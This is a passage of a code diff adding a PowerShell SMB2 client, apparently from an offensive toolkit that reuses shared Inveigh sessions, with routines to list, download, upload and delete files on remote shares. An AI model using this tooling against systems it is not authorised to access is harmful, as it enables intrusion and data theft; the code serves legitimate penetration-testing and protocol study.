+ $SMB_client_stage = 'CloseRequest'
+ $action_step++
+ }
+ elseif($Action -eq 'Put' -and $action_step -eq 4)
+ {
+ $output_message = "[+] File uploaded"
+ $SMB_client_stage = 'CloseRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'WriteRequest'
+ }
+
+ }
+
+ 'CreateRequestFindRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CreateRequest $SMB2_file 1
+ $packet_SMB2_data["DesiredAccess"] = 0x81,0x00,0x10,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_SMB2_header["NextCommand"] = [System.BitConverter]::GetBytes($SMB2_header.Length + $SMB2_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header["NextCommand"] = 0x68,0x00,0x00,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2b_data = New-PacketSMB2FindRequestFile 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff 0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2b_header + $SMB2b_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2b_header["Signature"] = $SMB2_signature
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2c_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2c_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2c_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2c_data = New-PacketSMB2FindRequestFile 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
+ $packet_SMB2c_data["OutputBufferLength"] = 0x80,0x00,0x00,0x00
+ $SMB2c_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_header
+ $SMB2c_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length + $SMB2c_header.Length) ($SMB2_data.Length + $SMB2b_data.Length + $SMB2c_data.Length)
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2c_header + $SMB2c_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2c_header["Signature"] = $SMB2_signature
+ $SMB2c_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data + $SMB2c_header + $SMB2c_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Action -eq 'Delete')
+ {
+ $SMB_client_stage = 'CreateRequest'
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ $action_step++
+ }
+ else
+ {
+ $SMB_client_stage = 'ParseDirectoryContents'
+ }
+
+ }
+
+ 'ParseDirectoryContents'
+ {
+ $subdirectory_list = New-Object System.Collections.ArrayList
+ $create_response_file = [System.BitConverter]::ToString($SMB_client_receive)
+ $create_response_file = $create_response_file -replace "-",""
+ $directory_contents_mode_list = New-Object System.Collections.ArrayList
+ $directory_contents_create_time_list = New-Object System.Collections.ArrayList
+ $directory_contents_last_write_time_list = New-Object System.Collections.ArrayList
+ $directory_contents_length_list = New-Object System.Collections.ArrayList
+ $directory_contents_name_list = New-Object System.Collections.ArrayList
+
+ if($directory_list.Count -gt 0)
+ {
+ $create_response_file_index = 152
+ $directory_list.RemoveAt(0) > $null
+ }
+ else
+ {
+ $create_response_file_index = $create_response_file.Substring(10).IndexOf("FE534D42") + 154
+ }
+
+ do
+ {
+ $SMB_next_offset = [System.BitConverter]::ToUInt32($SMB_client_receive[($create_response_file_index / 2 + $SMB_offset)..($create_response_file_index / 2 + 3 + $SMB_offset)],0)
+ $SMB_file_length = [System.BitConverter]::ToUInt32($SMB_client_receive[($create_response_file_index / 2 + 40 + $SMB_offset)..($create_response_file_index / 2 + 47 + $SMB_offset)],0)
+ $SMB_file_attributes = [Convert]::ToString($SMB_client_receive[($create_response_file_index / 2 + 56 + $SMB_offset)],2).PadLeft(16,'0')
+
+ if($SMB_file_length -eq 0)
+ {
+ $SMB_file_length = $null
+ }
+
+ if($SMB_file_attributes.Substring(11,1) -eq '1')
+ {
+ $SMB_file_mode = "d"
+ }
+ else
+ {
+ $SMB_file_mode = "-"
+ }
+
+ if($SMB_file_attributes.Substring(10,1) -eq '1')
+ {
+ $SMB_file_mode+= "a"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ if($SMB_file_attributes.Substring(15,1) -eq '1')
+ {
+ $SMB_file_mode+= "r"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ if($SMB_file_attributes.Substring(14,1) -eq '1')
+ {
+ $SMB_file_mode+= "h"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ if($SMB_file_attributes.Substring(13,1) -eq '1')
+ {
+ $SMB_file_mode+= "s"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ $file_create_time = [Datetime]::FromFileTime([System.BitConverter]::ToInt64($SMB_client_receive[($create_response_file_index / 2 + 8 + $SMB_offset)..($create_response_file_index / 2 + 15 + $SMB_offset)],0))
+ $file_create_time = Get-Date $file_create_time -format 'M/d/yyyy h:mm tt'
+ $file_last_write_time = [Datetime]::FromFileTime([System.BitConverter]::ToInt64($SMB_client_receive[($create_response_file_index / 2 + 24 + $SMB_offset)..($create_response_file_index / 2 + 31 + $SMB_offset)],0))
+ $file_last_write_time = Get-Date $file_last_write_time -format 'M/d/yyyy h:mm tt'
+ $SMB_filename_length = [System.BitConverter]::ToUInt32($SMB_client_receive[($create_response_file_index / 2 + 60 + $SMB_offset)..($create_response_file_index / 2 + 63 + $SMB_offset)],0)
+ $SMB_filename_unicode = $SMB_client_receive[($create_response_file_index / 2 + 104 + $SMB_offset)..($create_response_file_index / 2 + 104 + $SMB_offset + $SMB_filename_length - 1)]
+ $SMB_filename = [System.BitConverter]::ToString($SMB_filename_unicode)
+ $SMB_filename = $SMB_filename -replace "-00",""
+
+ if($SMB_filename.Length -gt 2)
+ {
+ $SMB_filename = $SMB_filename.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_filename_extract = New-Object System.String ($SMB_filename,0,$SMB_filename.Length)
+ }
+ else
+ {
+ $SMB_filename_extract = [String][Char][System.Convert]::ToInt16($SMB_filename,16)
+ }
+
+ if(!$Modify)
+ {
+ $file_last_write_time = $file_last_write_time.PadLeft(19,0)
+ [String]$SMB_file_length = $SMB_file_length
+ $SMB_file_length = $SMB_file_length.PadLeft(15,0)
+ }
+
+ if($SMB_file_attributes.Substring(11,1) -eq '1')
+ {
+
+ if($SMB_filename_extract -ne '.' -and $SMB_filename_extract -ne '..')
+ {
+ $subdirectory_list.Add($SMB_filename_unicode) > $null
+ $directory_contents_name_list.Add($SMB_filename_extract) > $null
+ $directory_contents_mode_list.Add($SMB_file_mode) > $null
+ $directory_contents_length_list.Add($SMB_file_length) > $null
+ $directory_contents_last_write_time_list.Add($file_last_write_time) > $null
+ $directory_contents_create_time_list.Add($file_create_time) > $null
+ }
+
+ }
+ else
+ {
+ $directory_contents_name_list.Add($SMB_filename_extract) > $null
+ $directory_contents_mode_list.Add($SMB_file_mode) > $null
+ $directory_contents_length_list.Add($SMB_file_length) > $null
+ $directory_contents_last_write_time_list.Add($file_last_write_time) > $null
+ $directory_contents_create_time_list.Add($file_create_time) > $null
+ }
+
+ if($share_subdirectory -and !$share_subdirectory_start)
+ {
+ $root_directory_string = $share_subdirectory + '\'
+ }
+
+ $SMB_offset += $SMB_next_offset
+ }
+ until($SMB_next_offset -eq 0)
+
+ if($directory_contents_name_list)
+ {
+
+ if($root_directory_string)
+ {
+ $file_directory = $target_share + "\" + $root_directory_string.Substring(0,$root_directory_string.Length - 1)
+ }
+ else
+ {
+ $file_directory = $target_share
+ }
+
+ }
+
+ $directory_contents_output = @()
+ $i = 0
+
+ ForEach($directory in $directory_contents_name_list)
+ {
+ $directory_object = New-Object PSObject
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Name -Value ($file_directory + "\" + $directory_contents_name_list[$i])
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Mode -Value $directory_contents_mode_list[$i]
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Length -Value $directory_contents_length_list[$i]
+
+ if($Modify)
+ {
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name CreateTime -Value $directory_contents_create_time_list[$i]
+ }
+
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name LastWriteTime -Value $directory_contents_last_write_time_list[$i]
+ $directory_contents_output += $directory_object
+ $i++
+ }
+
+ if($directory_contents_output -and !$Modify)
+ {
+
+ if($directory_contents_hide_headers)
+ {
+ ($directory_contents_output | Format-Table -Property @{ Name="Mode"; Expression={$_.Mode }; Alignment="left"; },
+ @{ Name="LastWriteTime"; Expression={$_.LastWriteTime }; Alignment="right"; },
+ @{ Name="Length"; Expression={$_.Length }; Alignment="right"; },
+ @{ Name="Name"; Expression={$_.Name }; Alignment="left"; } -AutoSize -HideTableHeaders -Wrap| Out-String).Trim()
+ }
+ else
+ {
+ $directory_contents_hide_headers = $true
+ ($directory_contents_output | Format-Table -Property @{ Name="Mode"; Expression={$_.Mode }; Alignment="left"; },
+ @{ Name="LastWriteTime"; Expression={$_.LastWriteTime }; Alignment="right"; },
+ @{ Name="Length"; Expression={$_.Length }; Alignment="right"; },
+ @{ Name="Name"; Expression={$_.Name }; Alignment="left"; } -AutoSize -Wrap| Out-String).Trim()
+ }
+
+ }
+ else
+ {
+ $directory_contents_output
+ }
+
+ $subdirectory_list.Reverse() > $null
+
+ ForEach($subdirectory in $subdirectory_list)
+ {
+ $directory_list.Insert(0,($root_directory + $subdirectory)) > $null
+ }
+
+ $SMB_offset = 0
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ 'FindRequest'
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header["NextCommand"] = 0x68,0x00,0x00,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2FindRequestFile $SMB_file_ID 0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2b_data = New-PacketSMB2FindRequestFile $SMB_file_ID
+ $packet_SMB2b_data["OutputBufferLength"] = 0x80,0x00,0x00,0x00
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length) ($SMB2_data.Length + $SMB2b_data.Length)
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2b_header + $SMB2b_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2b_header["Signature"] = $SMB2_signature
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Action -eq 'Get' -and $action_step -eq 1)
+ {
+ $find_response = [System.BitConverter]::ToString($SMB_client_receive)
+ $find_response = $find_response -replace "-",""
+ $file_unicode = [System.BitConverter]::ToString([System.Text.Encoding]::Unicode.GetBytes($source_file))
+ $file_unicode = $file_unicode -replace "-",""
+ $file_size_index = $find_response.IndexOf($file_unicode) - 128
+ $file_size = [System.BitConverter]::ToUInt32($SMB_client_receive[($file_size_index / 2)..($file_size_index / 2 + 7)],0)
+ $action_step++
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+
+ if($share_subdirectory -eq $file)
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($file)
+ }
+ else
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ }
+
+ }
+ else
+ {
+ $SMB_client_stage = 'ParseDirectoryContents'
+ }
+
+ }
+
+ 'CloseRequest'
+ {
+
+ if(!$SMB_file_ID)
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ }
+
+ $SMB2_message_ID ++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_file_ID = ''
+
+ if($directory_list.Count -gt 0 -and $Action -eq 'Recurse')
+ {
+ $SMB2_file = $directory_list[0]
+ $root_directory = $SMB2_file + 0x5c,0x00
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+
+ if($root_directory.Count -gt 2)
+ {
+ $root_directory_extract = [System.BitConverter]::ToString($root_directory)
+ $root_directory_extract = $root_directory_extract -replace "-00",""
+
+ if($root_directory.Length -gt 2)
+ {
+ $root_directory_extract = $root_directory_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $root_directory_string = New-Object System.String ($root_directory_extract,0,$root_directory_extract.Length)
+ }
+ else
+ {
+ $root_directory_string = [Char][System.Convert]::ToInt16($SMB2_file,16)
+ }
+
+ }
+
+ }
+ elseif($Action -eq 'Get' -and $action_step -eq 1)
+ {
+
+ if($share_subdirectory -eq $source_file)
+ {
+ $SMB2_file = ""
+ }
+ else
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory.Replace('\' + $source_file,''))
+ }
+
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ }
+ elseif($Action -eq 'Delete')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+
+ if($share_subdirectory -eq $source_file)
+ {
+ $SMB2_file = ""
+ }
+ else
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory.Replace('\' + $source_file,''))
+ }
+
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ $action_step++
+
+ }
+
+ 1
+ {
+ $SMB_client_stage = 'CreateRequestFindRequest'
+ }
+
+ 3
+ {
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ }
+
+ }
+ elseif($share_subdirectory_start)
+ {
+ $share_subdirectory_start = $false
+ $SMB_client_stage = 'CreateRequestFindRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ }
+
+ 'ReadRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditCharge"] = 0x01,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2ReadRequest $read_request_length $read_request_offset $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ Start-Sleep -m 5
+
+ if($read_request_length -eq 65536)
+ {
+ $i = 0
+
+ while($SMB_client.Available -lt 8192 -and $i -lt 10)
+ {
+ Start-Sleep -m $Sleep
+ $i++
+ }
+
+ }
+ else
+ {
+ Start-Sleep -m $Sleep
+ }
+
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Action -eq 'Get' -and $action_step -eq 3)
+ {
+ $action_step++
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ }
+ elseif($Action -eq 'Get' -and $action_step -eq 7)
+ {
+
+ if(!$NoProgress)
+ {
+ $percent_complete_calculation = [Math]::Truncate($read_request_step / $percent_complete * 100)
+ Write-Progress -Activity "Downloading $source_file - $progress_file_size" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation
+ }
+
+ $file_bytes = $SMB_client_receive[84..($read_request_length + 83)]
+
+ if(!$Modify)
+ {
+
+ if(!$file_write)
+ {
+ $file_write = New-Object 'System.IO.FileStream' $destination_path,'Append','Write','Read'
+ }
+
+ $file_write.Write($file_bytes,0,$file_bytes.Count)
+ }
+ else
+ {
+ $file_memory.AddRange($file_bytes)
+ }
+
+ if($read_request_step -lt $file_stream_size_quotient)
+ {
+ $read_request_offset+=65536
+ $read_request_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+ elseif($read_request_step -eq $file_stream_size_quotient -and $file_stream_size_remainder -ne 0)
+ {
+ $read_request_length = $file_stream_size_remainder
+ $read_request_offset+=65536
+ $read_request_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+ else
+ {
+
+ if(!$Modify)
+ {
+ $file_write.Close()
+ }
+ else
+ {
+ $file_memory.ToArray()
+ }
+
+ $output_message = "[+] File downloaded"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = 'CloseRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ 'WriteRequest'
+ {
+
+ if(!$Modify)
+ {
+ $source_file_binary_reader.BaseStream.Seek($write_request_offset,"Begin") > $null
+ $source_file_binary_reader.Read($source_file_buffer,0,$source_file_buffer_size) > $null
+ }
+ else
+ {
+ $source_file_buffer = $Source[$write_request_offset..($write_request_offset+$write_request_length)]
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditCharge"] = 0x01,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $write_request_length $write_request_offset $SMB_file_ID $source_file_buffer
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($write_request_step -lt $source_file_size_quotient)
+ {
+
+ if(!$NoProgress)
+ {
+ $percent_complete_calculation = [Math]::Truncate($write_request_step / $percent_complete * 100)
+ Write-Progress -Activity "[*] Uploading $source_file - $progress_file_size" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation
+ }
+
+ $write_request_offset+=65536
+ $write_request_step++
+ $SMB_client_stage = 'WriteRequest'
+ }
+ elseif($write_request_step -eq $source_file_size_quotient -and $source_file_size_remainder -ne 0)
+ {
+ $write_request_length = $source_file_size_remainder
+ $write_request_offset+=65536
+ $write_request_step++
+ $SMB_client_stage = 'WriteRequest'
+ }
+ else
+ {
+ $action_step++
+ $set_info_request_file_info_class = 0x01
+ $set_info_request_info_level = 0x04
+ $set_info_request_buffer = $source_file_creation_time +
+ $source_file_last_access_time +
+ $source_file_last_write_time +
+ $source_file_last_change_time +
+ 0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00
+
+ if(!$Modify)
+ {
+ $SMB_client_stage = 'SetInfoRequest'
+ }
+ else
+ {
+ $output_message = "[+] File uploaded from memory"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ }
+
+ 'TreeDisconnect'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($session_string -and !$Logoff)
+ {
+ $SMB_client_stage = 'Exit'
+ }
+ else
+ {
+ $SMB_client_stage = 'Logoff'
+ }
+
+ }
+
+ 'Logoff'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+ finally
+ {
+
+ if($file_write.Handle)
+ {
+ $file_write.Close()
+ }
+
+ if($source_file_stream.Handle)
+ {
+ $source_file_binary_reader.Close()
+ $source_file_stream.Close()
+ }
+
+ if($session_string -and $Inveigh)
+ {
+ $inveigh.session_lock_table[$session] = 'open'
+ $inveigh.session_message_ID_table[$session] = $SMB2_message_ID
+ $inveigh.session_list[$session] | Where-Object {$_."Last Activity" = Get-Date -format s}
+ }
+
+ if(!$session_string -or $Logoff)
+ {
+ $SMB_client.Close()
